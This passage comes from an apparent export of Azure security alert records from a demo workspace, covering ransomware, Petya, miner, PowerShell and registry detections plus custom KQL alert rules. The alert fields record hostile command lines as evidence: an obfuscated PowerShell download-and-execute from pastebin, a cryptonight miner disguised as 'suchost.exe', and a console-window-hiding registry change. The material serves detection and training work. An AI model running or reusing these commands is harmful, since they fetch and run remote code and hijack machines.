""Suspicious Process"": ""c:\\diagnostics\\usertmp\\ransomware.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x17b0"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=OltXpcVnjJn0Eb7%2F5og32xlx%2FFjeRO7%2FD%2FWRXRKwhi0%3D&spr=https&st=2019-01-14T23:39:50Z&se=2019-04-14T23:54:50Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""ransomware.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17b0"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:17.863405Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:17.863405Z"",
""EndTimeUtc"": ""2019-01-15T09:15:17.863405Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
63,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:17,2019-01-15 09:15:17,e647375c-9979-47b5-9f78-f414a1aad26d,2518547570821871899_e647375c-9979-47b5-9f78-f414a1aad26d,Detection,Microsoft,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Analysis of host data on MSTICALERTSWIN1 detected indicators associated with Petya ransomware. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for more information. Review the commandline associated in this alert and escalate this alert to your security team.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo rundll32.exe perfc.dat"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x17dc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Petya\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Petya.pdf?sv=2018-03-28&sr=b&sig=pbso6xXF6nk7cwihw20Kh77IZl0%2BrxBRrf%2FxX8l7tdU%3D&spr=https&st=2019-01-14T19:39:23Z&se=2019-04-14T19:54:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17dc"",
""CommandLine"": ""cmd /c echo rundll32.exe perfc.dat"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:17.81281Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:17.81281Z"",
""EndTimeUtc"": ""2019-01-15T09:15:17.81281Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
64,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:10,2019-01-15 09:15:10,4ea6c432-6d20-4986-9679-ecf58ac4854d,2518547570895430544_4ea6c432-6d20-4986-9679-ecf58ac4854d,Detection,Microsoft,Suspiciously named process detected,Suspiciously named process detected,Suspiciously named process detected,Analysis of host data on MSTICALERTSWIN1 detected a process whose name is very similar to but different from a very commonly run process (svchost). While this process could be benign attackers are known to sometimes hide in plain sight by naming their malicious tools to resemble legitimate process names.,High,False,"{
""Account Session Id"": ""0x13bded7"",
""Compromised Host"": ""MSTICALERTSWIN1"",
""Parent Process"": ""cmd.exe"",
""Process Id"": ""0x1704"",
""Similar To Process Name"": ""svchost"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Process Name"": ""suchost.exe"",
""User Name"": ""MSTICAlertsWin1\\MSTICAdmin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
},
{
""$id"": ""3"",
""Name"": ""msticadmin"",
""NTDomain"": ""msticalertswin1"",
""Host"": {
""$ref"": ""2""
},
""IsDomainJoined"": false,
""Type"": ""account""
},
{
""$id"": ""4"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:10.4569455Z"",
""EndTimeUtc"": ""2019-01-15T09:15:10.4569455Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""2""
},
""Account"": {
""$ref"": ""3""
}
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ImageFile"": {
""$ref"": ""5""
},
""Account"": {
""$ref"": ""3""
},
""Host"": {
""$ref"": ""2""
},
""Type"": ""process""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
65,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:12,2019-01-15 09:15:12,ce7c7361-8ac9-47be-b8fb-7a87c87ee178,2518547570876432155_ce7c7361-8ac9-47be-b8fb-7a87c87ee178,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xa60"",
""Suspicious Script"": "".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'Em17','pqCw')));}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xa60"",
""CommandLine"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:12.3567844Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:12.3567844Z"",
""EndTimeUtc"": ""2019-01-15T09:15:12.3567844Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
66,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:16,2019-01-15 09:15:16,2df8ae94-03fe-4b9f-a3a9-f3c6dab95c05,2518547570833725387_2df8ae94-03fe-4b9f-a3a9-f3c6dab95c05,Detection,Microsoft,Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),This is a test alert generated by Azure Security Center. No further action is needed.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\asc_alerttest_662jfi039n.exe"",
""Suspicious Command Line"": ""asc_alerttest_662jfi039n.exe -foo"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xc18"",
""Arguments Auditing Enabled"": ""true"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""asc_alerttest_662jfi039n.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xc18"",
""CommandLine"": ""asc_alerttest_662jfi039n.exe -foo"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:16.6274612Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:16.6274612Z"",
""EndTimeUtc"": ""2019-01-15T09:15:16.6274612Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
67,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:13,2019-01-15 09:15:13,1b074412-133c-4ac9-8e3f-24103159b03e,2518547570866947129_1b074412-133c-4ac9-8e3f-24103159b03e,Detection,Microsoft,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,"Analysis of host data on MSTICALERTSWIN1 detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in non-visible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00, corresponding to X-axis=0c00 and the Y-axis=0c00) this places the console app's window in a non-visible section of the user's screen in an area that is hidden from view below the visible start menu/taskbar. Known suspect Hex value includes, but not limited to c000c000",Low,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x13a8"",
""Hex Value set for WindowPosition"": ""200007c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x13a8"",
""CommandLine"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:13.305287Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""Hive"": ""HKEY_CURRENT_USER"",
""Key"": ""console"",
""Type"": ""registry-key""
},
{
""$id"": ""11"",
""Key"": {
""$ref"": ""10""
},
""ValueType"": ""Unknown"",
""Type"": ""registry-value""
},
{
""$id"": ""12"",
""Key"": {
""$ref"": ""10""
},
""Name"": ""windowposition"",
""Value"": ""System.Byte[]"",
""ValueType"": ""DWord"",
""Type"": ""registry-value""
},
{
""$id"": ""13"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:13.305287Z"",
""EndTimeUtc"": ""2019-01-15T09:15:13.305287Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
68,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 06:31:40,2019-01-15 06:31:40,0402d10c-7489-482f-9e8a-bfa36d167d18,b34d24c9-2223-4887-af93-7598abf28763,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-15T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25011"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""1703"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 25011
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25011
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 9143
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 819
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 498
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 06:41:46,,,
69,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 06:31:42,2019-01-15 06:31:42,1b71748c-de74-4d90-a41a-d474de2b1d17,9442245d-eaf6-47c5-b715-1c16b2c54fc4,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Plao Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-15T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25010"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""1703"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 25010
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25010
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 9143
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 819
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 498
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 06:41:55,,,
70,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 06:33:55,2019-01-15 06:33:55,ca8fd86e-af6f-4420-8aee-8470c5c2d2ff,edc4065d-886f-4aff-b17d-f1397ce4baec,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-15T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""24998"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 06:44:00,,,
71,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 21:18:10,2019-01-14 22:18:10,5eb2c501-77cc-4026-8a51-1f5b4ea99d63,1cca38a9-e0c5-4165-a78d-491ca2641c1c,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-14T22%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-14 22:28:13,,,
